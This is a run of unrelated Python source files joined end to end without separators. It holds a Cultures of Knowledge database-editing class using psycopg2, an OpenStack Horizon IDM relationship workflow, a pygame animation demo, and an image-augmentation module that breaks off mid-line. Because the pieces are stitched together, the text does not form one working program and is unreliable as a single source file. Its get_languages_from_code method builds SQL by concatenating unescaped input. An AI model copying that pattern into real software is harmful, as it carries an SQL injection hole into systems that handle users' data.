field_updates={}, print_sql=False, anonymous=False ): self._update( resource_id, field_updates, "cofk_union_resource", "resource_id", "resource", print_sql, anonymous ) def update_institution(self, institution_id, field_updates={}, print_sql=False, anonymous=False ): self._update( institution_id, field_updates, "cofk_union_institution", "institution_id", "institution", print_sql, anonymous) def update_image(self, image_id, field_updates={}, print_sql=False, anonymous=False ): self._update( image_id, field_updates, "cofk_union_image", "image_id", "image", 
print_sql, anonymous) def update_location(self, location_id, field_updates={}, print_sql=False, anonymous=False ): self._update( location_id, field_updates, "cofk_union_location", "location_id", "location", print_sql, anonymous) def _update( self, type_id, field_updates, update_table, where_field, type_name, print_sql=False, anonymous=False ): self.check_database_connection() # Create a list with all the data in. fields = list(field_updates.keys()) data = [] for field in fields : data.append( field_updates[field] ) # Ensuring order preserved. if not anonymous and "change_user" not in fields : fields.append( "change_user" ) data.append( self.user ) data.append( type_id ) # For where field # Create command command = "UPDATE " + update_table + " " command += "SET " count = 1 for field in fields : command += field + "=%s" if count != len(fields) : command += ", " count += 1 command += " WHERE " + where_field + "=%s" command = self.cursor.mogrify( command, data ) if self.debug or print_sql: print( "* UPDATE " + type_name + ":", command ) self.cursor.execute( command ) self._audit_update( type_name ) def delete_resource_via_resource_id( self, resource_id ): self.check_database_connection() command = "DELETE FROM cofk_union_resource WHERE resource_id=%s" command = self.cursor.mogrify( command, (resource_id,) ) self._print_command( "DELETE resource", command ) self._audit_delete("resource") self.cursor.execute( command ) def delete_relationship_via_relationship_id( self, relationship_id ): self.check_database_connection() command = "DELETE FROM cofk_union_relationship WHERE relationship_id=%s" command = self.cursor.mogrify( command, (relationship_id,) ) self._print_command( "DELETE relationship", command ) self._audit_delete("relationship") self.cursor.execute( command ) def delete_comment_via_comment_id( self, comment_id ): self.check_database_connection() command = "DELETE FROM cofk_union_comment WHERE comment_id=%s" command = self.cursor.mogrify( command, (comment_id,) ) self._print_command( "DELETE comment", command ) self._audit_delete("comment") self.cursor.execute( command ) def delete_manifestation_via_manifestation_id( self, manifestation_id ): self.check_database_connection() command = "DELETE FROM cofk_union_manifestation WHERE manifestation_id=%s" command = self.cursor.mogrify( command, (manifestation_id,) ) self._print_command( "DELETE manifestation", command ) self._audit_delete("manifestation") self.cursor.execute( command ) def delete_work_via_iwork_id( self, iwork_id ): self.check_database_connection() command = "DELETE FROM cofk_union_work WHERE iwork_id=%s" command = self.cursor.mogrify( command, (iwork_id,) ) self._print_command( "DELETE work", command ) self._audit_delete("work") self.cursor.execute( command ) def create_resource(self, name, url, description="" ): self.check_database_connection() command = "INSERT INTO cofk_union_resource" \ " (resource_name,resource_url,resource_details,creation_user,change_user)" \ " VALUES " \ " ( %s,%s,%s,%s,%s)" \ " returning resource_id" command = self.cursor.mogrify( command, ( name, url, description, self.user, self.user ) ) self._print_command( "INSERT resource", command ) self._audit_insert( "resource" ) self.cursor.execute( command ) return self.cursor.fetchone()[0] def create_comment(self, comment ): self.check_database_connection() command = "INSERT INTO cofk_union_comment" \ " (comment,creation_user,change_user)" \ " VALUES " \ " ( %s,%s,%s)" \ " returning comment_id" command = self.cursor.mogrify( command, ( comment, self.user, 
self.user ) ) self._print_command( "INSERT comment", command ) self._audit_insert( "comment" ) self.cursor.execute( command ) return self.cursor.fetchone()[0] def create_image(self, filename, display_order, image_credits, can_be_displayed='Y', thumbnail=None ): self.check_database_connection() command = "INSERT INTO cofk_union_image" \ " (image_filename,display_order,credits,can_be_displayed,thumbnail,licence_url,creation_user,change_user)" \ " VALUES " \ " ( %s,%s,%s,%s,%s,%s,%s,%s)" \ " returning image_id" command = self.cursor.mogrify( command, ( filename, display_order, image_credits, can_be_displayed, thumbnail, "http://cofk2.bodleian.ox.ac.uk/culturesofknowledge/licence/terms_of_use.html", self.user, self.user ) ) self._print_command( "INSERT image", command ) self._audit_insert( "image" ) self.cursor.execute( command ) return self.cursor.fetchone()[0] def create_manifestation(self, manifestation_id, manifestation_type, printed_edition_details=None, id_number_or_shelfmark=None ): self.check_database_connection() command = "INSERT INTO cofk_union_manifestation" \ " (manifestation_id,manifestation_type,id_number_or_shelfmark,printed_edition_details,creation_user,change_user)" \ " VALUES " \ " ( %s,%s,%s,%s,%s,%s)" \ " returning manifestation_id" command = self.cursor.mogrify( command, ( manifestation_id, manifestation_type, id_number_or_shelfmark, printed_edition_details, self.user, self.user ) ) self._print_command( "INSERT manifestation", command ) self._audit_insert( "manifestation" ) self.cursor.execute( command ) return self.cursor.fetchone()[0] def create_relationship(self, left_name, left_id, relationship_type, right_name, right_id ): self.check_database_connection() command = "INSERT INTO cofk_union_relationship" \ " (left_table_name,left_id_value, relationship_type, right_table_name, right_id_value,creation_user,change_user)" \ " VALUES " \ " (%s, %s, %s, %s, %s,%s,%s)"\ " returning relationship_id" command = self.cursor.mogrify( command, ( left_name, left_id, relationship_type, right_name, right_id, self.user, self.user ) ) self._print_command( "INSERT relationship", command ) self._audit_insert( "relationship" ) self.cursor.execute( command ) return self.cursor.fetchone()[0] # Created / author / authored def create_relationship_created(self, person_id, work_id ): self.create_relationship('cofk_union_person', person_id, 'created', 'cofk_union_work', work_id ) # addressed / sent def create_relationship_addressed_to(self, work_id, person_id ): self.create_relationship( 'cofk_union_work', work_id, 'was_addressed_to', 'cofk_union_person', person_id ) def create_relationship_mentions(self, work_id, person_id ): self.create_relationship( 'cofk_union_work', work_id, 'mentions', 'cofk_union_person', person_id ) # sent to / destination def create_relationship_was_sent_to(self, work_id, location_id ): self.create_relationship( 'cofk_union_work', work_id, 'was_sent_to', 'cofk_union_location', location_id ) # sent from / origin def create_relationship_was_sent_from(self, work_id, location_id ): self.create_relationship( 'cofk_union_work', work_id, 'was_sent_from', 'cofk_union_location', location_id ) def create_relationship_mentions_place(self, work_id, location_id ): self.create_relationship( 'cofk_union_work', work_id, 'mentions_place', 'cofk_union_location', location_id ) def create_relationship_work_resource(self, work_id, resource_id ): self.create_relationship( 'cofk_union_work', work_id, 'is_related_to', 'cofk_union_resource', resource_id ) def 
create_relationship_person_resource(self, person_id, resource_id ): self.create_relationship( 'cofk_union_person', person_id, 'is_related_to', 'cofk_union_resource', resource_id ) def create_relationship_note_on_work_route(self, comment_id, work_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'route', 'cofk_union_work', work_id ) def create_relationship_note_on_work_date(self, comment_id, work_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to_date', 'cofk_union_work', work_id ) def create_relationship_note_on_work_author(self, comment_id, work_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to_author', 'cofk_union_work', work_id ) def create_relationship_note_on_work_origin(self, comment_id, work_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to_origin', 'cofk_union_work', work_id ) def create_relationship_note_on_work_destination(self, comment_id, work_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to_destination', 'cofk_union_work', work_id ) def create_relationship_note_on_work_generally(self, comment_id, work_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to', 'cofk_union_work', work_id ) def create_relationship_note_on_work_people_mentioned(self, comment_id, work_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to_people_mentioned_in_work', 'cofk_union_work', work_id ) def create_relationship_note_on_work_addressee(self, comment_id, work_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to_addressee', 'cofk_union_work', work_id ) def create_relationship_note_on_person(self, comment_id, person_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to', 'cofk_union_person', person_id ) def create_relationship_work_reply_to(self, work_reply_id, work_id ): self.create_relationship( 'cofk_union_work', work_reply_id, 'is_reply_to', 'cofk_union_work', work_id ) def create_relationship_note_manifestation(self, comment_id, manifestation_id ): self.create_relationship( 'cofk_union_comment', comment_id, 'refers_to', 'cofk_union_manifestation', manifestation_id ) def create_relationship_manifestation_in_repository(self, manifestation_id, repository_id ): self.create_relationship( 'cofk_union_manifestation', manifestation_id, 'stored_in', 'cofk_union_institution', repository_id ) def create_relationship_manifestation_of_work(self, manifestation_id, work_id ): self.create_relationship( 'cofk_union_manifestation', manifestation_id, 'is_manifestation_of', 'cofk_union_work', work_id ) def create_work(self, work_id_end, abstract=None, accession_code=None, addressees_as_marked=None, addressees_inferred=0, addressees_uncertain=0, authors_as_marked=None, authors_inferred=0, authors_uncertain=0, date_of_work2_std_day=None, date_of_work2_std_month=None, date_of_work2_std_year=None, date_of_work_approx=0, date_of_work_as_marked=None, date_of_work_inferred=0, date_of_work_std_day=None, date_of_work_std_is_range=0, date_of_work_std_month=None, date_of_work_std_year=None, date_of_work_uncertain=0, description=None, destination_as_marked=None, destination_inferred=0, destination_uncertain=0, edit_status='', editors_notes=None, explicit=None, incipit=None, keywords=None, language_of_work=None, origin_as_marked=None, origin_inferred=0, origin_uncertain=0, original_calendar=None, original_catalogue=None, ps=None, relevant_to_cofk='Y', work_is_translation=0, work_to_be_deleted=0 ): change_user = 
self.user creation_user = self.user work_id_base = "work_" + datetime.strftime( datetime.now(), "%Y%m%d%H%M%S%f" ) + "_" # e.g. work_20181108182143954875_ work_id = work_id_base + work_id_end addressees_inferred = self.get_int_value(addressees_inferred, 0) addressees_uncertain = self.get_int_value(addressees_uncertain, 0) authors_inferred = self.get_int_value(authors_inferred, 0) authors_uncertain = self.get_int_value(authors_uncertain, 0) date_of_work2_std_day = self.get_int_value(date_of_work2_std_day) date_of_work2_std_month = self.get_int_value(date_of_work2_std_month) date_of_work2_std_year = self.get_int_value(date_of_work2_std_year) date_of_work_std_day = self.get_int_value(date_of_work_std_day) date_of_work_std_month = self.get_int_value(date_of_work_std_month) date_of_work_std_year = self.get_int_value(date_of_work_std_year) date_of_work_approx = self.get_int_value(date_of_work_approx, 0) date_of_work_inferred = self.get_int_value(date_of_work_inferred, 0) date_of_work_std_is_range = self.get_int_value(date_of_work_std_is_range, 0) date_of_work_uncertain = self.get_int_value(date_of_work_uncertain, 0) destination_inferred = self.get_int_value(destination_inferred, 0) destination_uncertain = self.get_int_value(destination_uncertain, 0) origin_inferred = self.get_int_value(origin_inferred, 0) origin_uncertain = self.get_int_value(origin_uncertain, 0) work_is_translation = self.get_int_value(work_is_translation, 0) work_to_be_deleted = self.get_int_value(work_to_be_deleted, 0) date_of_work_std = self.get_date_string(date_of_work_std_year, date_of_work_std_month, date_of_work_std_day ) date_of_work_std_gregorian = date_of_work_std command = "INSERT INTO cofk_union_work" \ " (" \ "abstract"\ ",accession_code"\ ",addressees_as_marked"\ ",addressees_inferred"\ ",addressees_uncertain"\ ",authors_as_marked"\ ",authors_inferred"\ ",authors_uncertain"\ ",change_user"\ ",creation_user"\ ",date_of_work2_std_day"\ ",date_of_work2_std_month"\ ",date_of_work2_std_year"\ ",date_of_work_approx"\ ",date_of_work_as_marked"\ ",date_of_work_inferred"\ ",date_of_work_std"\ ",date_of_work_std_day"\ ",date_of_work_std_gregorian"\ ",date_of_work_std_is_range"\ ",date_of_work_std_month"\ ",date_of_work_std_year"\ ",date_of_work_uncertain"\ ",description"\ ",destination_as_marked"\ ",destination_inferred"\ ",destination_uncertain"\ ",edit_status"\ ",editors_notes"\ ",explicit"\ ",incipit"\ ",keywords"\ ",language_of_work"\ ",origin_as_marked"\ ",origin_inferred"\ ",origin_uncertain"\ ",original_calendar"\ ",original_catalogue"\ ",ps"\ ",relevant_to_cofk"\ ",work_id"\ ",work_is_translation"\ ",work_to_be_deleted"\ ")" \ " VALUES " \ " (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)" command = self.cursor.mogrify( command, ( abstract, accession_code, addressees_as_marked, addressees_inferred, addressees_uncertain, authors_as_marked, authors_inferred, authors_uncertain, change_user, creation_user, date_of_work2_std_day, date_of_work2_std_month, date_of_work2_std_year, date_of_work_approx, date_of_work_as_marked, date_of_work_inferred, date_of_work_std, date_of_work_std_day, date_of_work_std_gregorian, date_of_work_std_is_range, date_of_work_std_month, date_of_work_std_year, date_of_work_uncertain, description, destination_as_marked, destination_inferred, destination_uncertain, edit_status, editors_notes, explicit, incipit, keywords, language_of_work, origin_as_marked, origin_inferred, origin_uncertain, original_calendar,
original_catalogue, ps, relevant_to_cofk, work_id, work_is_translation, work_to_be_deleted ) ) self._print_command( "CREATE work", command ) self._audit_insert( "work" ) self.cursor.execute( command ) return work_id def create_person_or_organisation( self, primary_name, synonyms=None, aliases=None, gender=None, is_org=None, org_type=None, birth_year=None, birth_month=None, birth_day=None, birth_inferred=0, birth_uncertain=0, birth_approx=0, death_year=None, death_month=None, death_day=None, death_inferred=0, death_uncertain=0, death_approx=0, flourished_year_1=None, flourished_year_2=None, flourished_range=0, editors_note='' ): birth_year = self.get_int_value(birth_year) birth_month = self.get_int_value(birth_month) birth_day = self.get_int_value(birth_day) birth_approx = self.get_int_value(birth_approx, 0) birth_inferred = self.get_int_value(birth_inferred, 0) birth_uncertain = self.get_int_value(birth_uncertain, 0) death_year = self.get_int_value(death_year) death_month = self.get_int_value(death_month) death_day = self.get_int_value(death_day) death_approx = self.get_int_value(death_approx, 0) death_inferred = self.get_int_value(death_inferred, 0) death_uncertain = self.get_int_value(death_uncertain, 0) flourished_year_1 = self.get_int_value(flourished_year_1) flourished_year_2 = self.get_int_value(flourished_year_2) flourished_range = self.get_int_value(flourished_range, 0) ## is_org = self.get_int_value(is_org, 0) if is_org == 1 or is_org == '1' or is_org == 'Y' or is_org == 'y' : is_org = 'Y' else : is_org = '' if is_org == 'Y' : org_type = self.get_int_value(org_type) if org_type == '' : org_type = None date_of_birth = None if birth_year or birth_month or birth_day : date_of_birth = self.get_date_string(birth_year, birth_month, birth_day ) date_of_death = None if death_year or death_month or death_day : date_of_death = self.get_date_string(death_year, death_month, death_day ) flourished = None if flourished_year_1 : flourished = self.get_date_string( flourished_year_1 ) elif flourished_year_2 : flourished = self.get_date_string( flourished_year_2 ) if synonyms : synonyms = "; ".join( synonyms.split("\n") ) if aliases : aliases = "; ".join( aliases.split("\n") ) if gender == 'm' or gender == 'M' : gender = 'M' elif gender == 'f' or gender == 'F' : gender = 'F' else : gender = '' self.check_database_connection() # Get next available ID. 
command = "select nextval('cofk_union_person_iperson_id_seq'::regclass);" self.cursor.execute( command ) iperson_id = self.cursor.fetchone()[0] person_id = "cofk_union_person-iperson_id:000" + str(iperson_id) command = "INSERT INTO cofk_union_person" \ " (" \ "person_id,iperson_id,"\ "foaf_name,skos_altlabel,person_aliases," \ "date_of_birth_year,date_of_birth_month,date_of_birth_day," \ "date_of_birth_inferred,date_of_birth_uncertain,date_of_birth_approx," \ "date_of_birth," \ "date_of_death_year,date_of_death_month,date_of_death_day," \ "date_of_death_inferred,date_of_death_uncertain,date_of_death_approx," \ "date_of_death," \ "gender," \ "is_organisation,organisation_type," \ "flourished_year,flourished2_year,flourished_is_range," \ "flourished," \ "editors_notes," \ "creation_user,change_user" \ " )" \ " VALUES " \ " (" \ "%s,%s," \ "%s,%s,%s," \ "%s,%s,%s," \ "%s,%s,%s," \ "%s," \ "%s,%s,%s," \ "%s,%s,%s," \ "%s," \ "%s," \ "%s,%s," \ "%s,%s,%s," \ "%s," \ "%s," \ "%s,%s" \ ")" \ " returning person_id" command = self.cursor.mogrify( command, ( person_id, iperson_id, primary_name, synonyms, aliases, birth_year, birth_month, birth_day, birth_inferred, birth_uncertain, birth_approx, date_of_birth, death_year, death_month, death_day, death_inferred, death_uncertain, death_approx, date_of_death, gender, is_org, org_type, flourished_year_1, flourished_year_2, flourished_range, flourished, editors_note, self.user, self.user ) ) self._print_command( "INSERT person", command ) self._audit_insert( "person" ) self.cursor.execute( command ) return self.cursor.fetchone()[0] def create_location(self, latitude=None, longitude=None, location_synonyms=None, editors_note=None, element_1_eg_room='', element_2_eg_building='', element_3_eg_parish='', element_4_eg_city='', element_5_eg_county='', element_6_eg_country='', element_7_eg_empire='' ): location_list = [] for value in [element_1_eg_room, element_2_eg_building, element_3_eg_parish, element_4_eg_city, element_5_eg_county, element_6_eg_country, element_7_eg_empire ] : if value is not None and value != '' : location_list.append(value) location_name = ", ".join(location_list) command = "INSERT INTO cofk_union_location" \ " (" \ "location_name," \ "latitude,longitude," \ "location_synonyms," \ "element_1_eg_room,element_2_eg_building," \ "element_3_eg_parish,element_4_eg_city," \ "element_5_eg_county,element_6_eg_country," \ "element_7_eg_empire," \ "editors_notes," \ "creation_user,change_user" \ " )" \ " VALUES " \ " (" \ "%s," \ "%s,%s," \ "%s," \ "%s,%s," \ "%s,%s," \ "%s,%s," \ "%s," \ "%s," \ "%s,%s" \ ")" \ " returning location_id" command = self.cursor.mogrify( command, ( location_name, latitude, longitude, location_synonyms, element_1_eg_room, element_2_eg_building, element_3_eg_parish, element_4_eg_city, element_5_eg_county, element_6_eg_country, element_7_eg_empire, editors_note, self.user, self.user ) ) self._print_command( "INSERT location", command ) self._audit_insert( "location" ) self.cursor.execute( command ) return self.cursor.fetchone()[0] def get_languages_from_code(self, code ): ### print( tweaker.get_languages_from_code( "lat;fra;eng" ) ) ### English, French, Latin ### codes = code.split(";") where = [] for code in codes : where.append( "code_639_3='" + code + "'") command = "SELECT language_name from iso_639_language_codes" \ " where " + " OR ".join( where ) self.cursor.execute( command ) languages = [] for lang in self.cursor: languages.append( lang['language_name'] ) return ", ".join(languages) @staticmethod def
get_int_value(value, default=None): if value is not None and value != '' : return int(value) return default @staticmethod def get_date_string(year=None, month=None, day=None) : # Switch to numbers year = int(year) if year is not None else 9999 month = int(month) if month is not None else 12 if day is None : if month in [1, 3, 5, 7, 8, 10, 12] : day = 31 elif month == 2 : day = 28 # should we look for leap years? else : day = 30 year = str(year) if month < 10 : month = "0" + str(month) else : month = str(month) if day < 10 : day = "0" + str(day) else : day = str(day) return year + "-" + month + "-" + day def triggers_enable(self, table_name, triggers=[] ): command = "ALTER TABLE " + table_name + " " triggers_string = [] for trigger in triggers : triggers_string.append( "ENABLE TRIGGER " + trigger ) command += ",".join( triggers_string ) command += ";" command = self.cursor.mogrify( command ) self._print_command( "ENABLE Triggers", command ) self.cursor.execute( command ) def triggers_disable(self, table_name, triggers=[] ): command = "ALTER TABLE " + table_name + " " triggers_string = [] for trigger in triggers : triggers_string.append( "DISABLE TRIGGER " + trigger ) command += ",".join( triggers_string ) command += ";" command = self.cursor.mogrify( command ) self._print_command( "DISABLE Triggers", command ) self.cursor.execute( command ) def calendar_julian_to_calendar_gregorian(self, day, month, year ): # day = 1 to max_length # month = 1 to 12 # year = a number... max_month = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31] if year % 4 == 0: max_month[1] = 29 # Julian calendar change diff_days = 10 if year > 1700 : diff_days = 11 elif year == 1700 and month > 2 : diff_days = 11 elif year == 1700 and month == 2 and day == 29 : diff_days = 11 # get new date new_day = day + diff_days new_month = month new_year = year if new_day > max_month[month-1] : new_day = new_day % max_month[month-1] new_month += 1 if new_month > 12: new_month = 1 new_year += 1 return { "d" : new_day, "m": new_month, "y": new_year } def commit_changes( self, commit=False, quiet=False ): self.check_database_connection() if commit : self.connection.commit() else : self.connection.rollback() self._reset_audit() if not quiet : if commit: print( "Committing...", end="") print( "Done." ) else : print( "NOT committing... ", end="") print("Rolled back.") def check_database_connection(self): if not self.database_ok() : raise psycopg2.DatabaseError("Database not connected") def database_ok(self): return self.connection and self.cursor def load_schema(self): schema_location = os.path.join(os.path.dirname(__file__), 'schema.json') with open( schema_location ) as f: self.schema = json.load(f) def convert_field_type(self, object_type, field_name, value ): if value is None: return None if self.schema is None: self.load_schema() # types: string number flag timestamp uuid field_type = self.schema["fields"][object_type][field_name] if field_type == "string" or field_type == 'uuid': if isinstance( value, unicode): return value else: return str( value ) elif field_type == "number" : return self.get_int_value( value ) elif field_type == "flag" : if value == "1" or value == "Y" or value == "y" or value is True or value == 1: return 1 if value == "0" or value == "N" or value == "n" or value is False or value == 0 : return 0 elif field_type == "timestamp" or field_type == "date": return value # hopefully the database can sort this... return value # Or None, or raise exception?
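# A minimal, self-contained sketch of the Julian-to-Gregorian offset logic used by
# calendar_julian_to_calendar_gregorian above; the helper name below is hypothetical
# and only mirrors that method's behaviour so the 10/11-day shift can be checked in isolation.
def _julian_to_gregorian_sketch(day, month, year):
    """Return the Gregorian equivalent of a Julian calendar date as a d/m/y dict."""
    max_month = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
    if year % 4 == 0:
        max_month[1] = 29  # every fourth year is a leap year in the Julian calendar
    # Dates up to 28 February 1700 (Julian) are shifted by 10 days, later dates by 11 days.
    diff_days = 11 if (year > 1700 or (year == 1700 and (month > 2 or (month == 2 and day == 29)))) else 10
    new_day, new_month, new_year = day + diff_days, month, year
    if new_day > max_month[month - 1]:  # roll over into the next month (and possibly the next year)
        new_day = new_day % max_month[month - 1]
        new_month += 1
        if new_month > 12:
            new_month = 1
            new_year += 1
    return {"d": new_day, "m": new_month, "y": new_year}

# Worked examples: 15 October 1663 (Julian) -> 25 October 1663 (Gregorian, +10 days);
# 1 March 1700 (Julian) -> 12 March 1700 (Gregorian, +11 days).
assert _julian_to_gregorian_sketch(15, 10, 1663) == {"d": 25, "m": 10, "y": 1663}
assert _julian_to_gregorian_sketch(1, 3, 1700) == {"d": 12, "m": 3, "y": 1700}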
def print_audit(self, going_to_commit=True): print( "Audit:" ) for deleting, number in iter( self.audit["deletions"].items() ) : if going_to_commit : print( "- Deleting " + str( number ) + " " + deleting + "(s)" ) else : print( "- I would have deleted " + str( number ) + " " + deleting + "(s)" ) if len( self.audit["deletions"] ) == 0 : print ( "- Nothing to delete") for inserting, number in iter( self.audit["insertions"].items() ) : if going_to_commit : print( "- Inserting " + str( number ) + " " + inserting + "(s)" ) else : print( "- I would have inserted " + str( number ) + " " + inserting + "(s)" ) if len( self.audit["insertions"] ) == 0 : print ( "- Nothing to insert") for updating, number in iter( self.audit["updates"].items() ) : if going_to_commit : print( "- Updating " + str( number ) + " " + updating + "(s)" ) else : print( "- I would have updated " + str( number ) + " " + updating + "(s)" ) if len( self.audit["updates"] ) == 0 : print ( "- Nothing to update") if not going_to_commit : print( "- Not commiting changes." ) def _audit_update(self, updated): if updated not in self.audit["updates"] : self.audit["updates"][updated] = 1 else : self.audit["updates"][updated] += 1 def _audit_delete(self, deleted): if deleted not in self.audit["deletions"] : self.audit["deletions"][deleted] = 1 else : self.audit["deletions"][deleted] += 1 def _audit_insert(self, inserted): if inserted not in self.audit["insertions"] : self.audit["insertions"][inserted] = 1 else : self.audit["insertions"][inserted] += 1 def _print_command(self, name, command ): if self.debug : print( " *", name + ":", command ) # Copyright (C) 2014 Universidad Politecnica de Madrid # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import logging from django.core.urlresolvers import reverse from horizon import exceptions from horizon import forms from horizon import messages from horizon import workflows from openstack_dashboard.dashboards.idm import utils as idm_utils LOG = logging.getLogger('idm_logger') RELATIONSHIP_SLUG = "update_owners" class RelationshipApiInterface(object): """Holds the api calls for each specific relationship""" def _list_all_owners(self, request, superset_id): pass def _list_all_objects(self, request, superset_id): pass def _list_current_assignments(self, request, superset_id): pass def _get_default_object(self, request): pass def _add_object_to_owner(self, request, superset, owner, obj): pass def _remove_object_from_owner(self, request, superset, owner, obj): pass def _get_supersetid_name(self, request, superset_id): pass class RelationshipConsumerMixin(object): RELATIONSHIP_CLASS = None def _load_relationship_api(self): return self.RELATIONSHIP_CLASS() class UpdateRelationshipAction(workflows.MembershipAction, RelationshipConsumerMixin): ERROR_MESSAGE = ('Unable to retrieve data. 
Please try again later.') ERROR_URL = '' def __init__(self, request, *args, **kwargs): super(UpdateRelationshipAction, self).__init__(request, *args, **kwargs) self.relationship = self._load_relationship_api() self.superset_id = self._get_superset_id() # Get the default role try: default_object = self.relationship._get_default_object(request) except Exception: exceptions.handle(request, self.ERROR_MESSAGE, redirect=reverse(self.ERROR_URL)) if default_object: self._init_default_object_field(default_object) # Get list of available owners try: owners_list = self.relationship._list_all_owners(request, self.superset_id) except Exception: exceptions.handle(request, self.ERROR_MESSAGE, redirect=reverse(self.ERROR_URL)) # Get list of objects try: object_list = self.relationship._list_all_objects(request, self.superset_id) except Exception: exceptions.handle(request, self.ERROR_MESSAGE, redirect=reverse(self.ERROR_URL)) self._init_object_fields(object_list, owners_list) # Figure out owners & objects try: owners_objects_relationship = \ self.relationship._list_current_assignments(request, self.superset_id) except Exception: exceptions.handle(request, self.ERROR_MESSAGE, redirect=reverse(self.ERROR_URL)) # Flag the alredy owned ones self._init_current_assignments(owners_objects_relationship) def _init_default_object_field(self, default_object): default_object_name = self.get_default_role_field_name() self.fields[default_object_name] = forms.CharField(required=False) self.fields[default_object_name].initial = default_object.id def _init_object_fields(self, object_list, owners_list): relationship = self._load_relationship_api() for obj in object_list: field_name = self.get_member_field_name(obj.id) label = obj.name widget = forms.widgets.SelectMultiple(attrs={ 'data-superset-name': relationship._get_supersetid_name(self.request, self.superset_id), 'data-superset-id':self.superset_id, }) self.fields[field_name] = forms.MultipleChoiceField( required=False, label=label, widget=widget) self.fields[field_name].choices = owners_list self.fields[field_name].initial = [] def _init_current_assignments(self, owners_objects_relationship): for owner_id in owners_objects_relationship: objects_ids = owners_objects_relationship[owner_id] for object_id in objects_ids: field_name = self.get_member_field_name(object_id) if field_name in self.fields: self.fields[field_name].initial.append(owner_id) def _get_superset_id(self): return self.initial['superset_id'] class Meta: slug = RELATIONSHIP_SLUG class UpdateRelationshipStep(workflows.UpdateMembersStep, RelationshipConsumerMixin): action_class = UpdateRelationshipAction contributes = ("superset_id",) server_filter_text = "Use the filter." def contribute(self, data, context): superset_id = context['superset_id'] if data: self.relationship = self._load_relationship_api() try: object_list = self.relationship._list_all_objects( self.workflow.request, superset_id) except Exception: exceptions.handle(self.workflow.request, ('Unable to retrieve list.')) post = self.workflow.request.POST for obj in object_list: field = self.get_member_field_name(obj.id) context[field] = post.getlist(field) return context class RelationshipWorkflow(workflows.Workflow, RelationshipConsumerMixin): default_steps = (UpdateRelationshipStep,) member_slug = RELATIONSHIP_SLUG current_user_editable = True no_roles_message = 'Some users don\'t have any role assigned. 
If you save now \ they won\'t be authorized in the application' def handle(self, request, data): superset_id = data['superset_id'] member_step = self.get_step(self.member_slug) self.relationship = self._load_relationship_api() try: object_list = self.relationship._list_all_objects( request, superset_id) owners_objects_relationship = \ self.relationship._list_current_assignments(request, superset_id) # re-index by object with a owner list for easier processing # in later steps current_objects = idm_utils.swap_dict(owners_objects_relationship) # Parse the form data modified_objects = {} for obj in object_list: field_name = member_step.get_member_field_name(obj.id) modified_objects[obj.id] = data[field_name] # Create the delete and add sets objects_to_add, objects_to_delete = \ self._create_add_and_delete_sets(modified_objects, current_objects) # Add the objects for object_id in objects_to_add: for owner_id in objects_to_add[object_id]: if (not self.current_user_editable and owner_id == request.user.id): messages.warning( request, 'You can\'t edit your own roles') else: self.relationship._add_object_to_owner( self.request, superset=superset_id, owner=owner_id, obj=object_id) # Remove the objects for object_id in objects_to_delete: for owner_id in objects_to_delete[object_id]: if (not self.current_user_editable and owner_id == request.user.id): messages.warning( request, 'You can\'t edit your own roles') else: self.relationship._remove_object_from_owner( self.request, superset=superset_id, owner=owner_id, obj=object_id) return True except Exception: exceptions.handle(request, ('Failed to modify organization\'s members.')) return False def _create_add_and_delete_sets(self, modified_objects, current_objects): objects_to_add = {} objects_to_delete = {} for object_id in modified_objects: new_owners = set(modified_objects.get(object_id, [])) current_owners = set(current_objects.get(object_id, [])) # owners to add-> owners in N and not in C -> N-C owners_to_add = new_owners - current_owners if owners_to_add: objects_to_add[object_id] = owners_to_add # owners to delete -> owners in C and not in N -> C-N owners_to_delete = current_owners - new_owners if owners_to_delete: objects_to_delete[object_id] = owners_to_delete return objects_to_add, objects_to_delete from PygameHelper import Animation from PygameHelper import load_image, resize_image_ratio, WHITE import pygame pygame.init() WIDTH, HEIGHT = 500, 500 WIN = pygame.display.set_mode((WIDTH, HEIGHT)) pygame.display.set_caption("animation") images = [resize_image_ratio(load_image(f"assets/clock/clock_{i+1}.png"), (64, 64)) for i in range(8)] animation = Animation(WIN, WIDTH//2 - 64//2, HEIGHT//2 - 64//2, images, 5) clock = pygame.time.Clock() FPS = 60 while True: clock.tick(FPS) for event in pygame.event.get(): if event.type == pygame.QUIT or event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE: pygame.quit() quit(-1) WIN.fill(WHITE) animation.animate() animation.draw() pygame.display.update() import cv2 import numpy as np import random class Compose: def __init__(self, augmentations): self.augmentations = augmentations def __call__(self, data): for aug in self.augmentations: data = aug(data) return data class RandomHorizontalFlip: def __init__(self, prob=0.5): self.prob = prob def __call__(self, data): if random.random() < self.prob: # call copy() to avoid negative stride error in torch.from_numpy data = [d[:, ::-1].copy() for d in data] return data class RandomScale: def __init__(self, scale_range=(0.75, 3.0)): self.scale_range = 
